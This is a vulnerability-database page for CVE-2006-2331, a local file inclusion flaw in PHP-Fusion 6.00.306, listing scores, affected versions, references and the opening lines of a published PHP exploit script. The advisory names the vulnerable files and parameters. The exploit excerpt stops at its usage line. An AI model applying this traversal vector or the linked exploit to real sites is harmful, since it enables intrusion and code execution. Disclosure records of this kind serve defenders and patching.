Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
6.4
CVSSv2

CVE-2006-2331

Published: 12/05/2006 Updated: 18/10/2018
CVSS v2 Base Score: 6.4 | Impact Score: 4.9 | Exploitability Score: 10
VMScore: 645
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N
Subscribe to Php Fusion

Vulnerability Summary

Multiple directory traversal vulnerabilities in PHP-Fusion 6.00.306 allow remote malicious users to include and execute arbitrary local files via (1) a .. (dot dot) in the settings[locale] parameter in infusions/last_seen_users_panel/last_seen_users_panel.php, and (2) a .. (dot dot) in the localeset parameter in setup.php. NOTE: the vendor states that this issue might exist due to problems in third party local files.

Vulnerable Product Search on Vulmon Subscribe to Product

php fusion php fusion 6.00.106

php fusion php fusion 6.00.107

php fusion php fusion 6.00.304

php fusion php fusion 6.00.306

php fusion php fusion 6.00.105

php fusion php fusion 6.00.3

php fusion php fusion 6.00.303

php fusion php fusion 6.00.109

php fusion php fusion 6.00.110

php fusion php fusion 6.00.204

php fusion php fusion 6.00.206

Exploits

Exploit DB: PHP-Fusion 6.00.306 - Multiple Vulnerabilities
#!/usr/bin/php -q -d short_open_tag=on <? echo "PHPFusion <= v600306 avatar mod_mime arbitrary file upload &\r\n"; echo "local inclusion vulnerabilities\r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n\r\n"; if ($argc<6) { echo "Usage: php "$argv[0]" host path user pass cmd OPTIONS\r\n"; ...

References

NVD-CWE-Otherhttp://www.php-fusion.co.uk/news.phphttp://www.php-fusion.co.uk/news.php?readmore=321http://www.securityfocus.com/bid/17898http://secunia.com/advisories/19992http://www.osvdb.org/25538http://www.osvdb.org/25539http://securityreason.com/securityalert/194http://securityreason.com/securityalert/873http://www.vupen.com/english/advisories/2006/1735https://exchange.xforce.ibmcloud.com/vulnerabilities/26389http://www.securityfocus.com/archive/1/433277/100/0/threadedhttps://nvd.nist.govhttps://www.exploit-db.com/exploits/1760/
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2006-4304CVE-2024-4240arbitrary CVE-2024-31601XSSCVE-2023-20198CVE-2024-4256CVE-2024-3342encryption
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook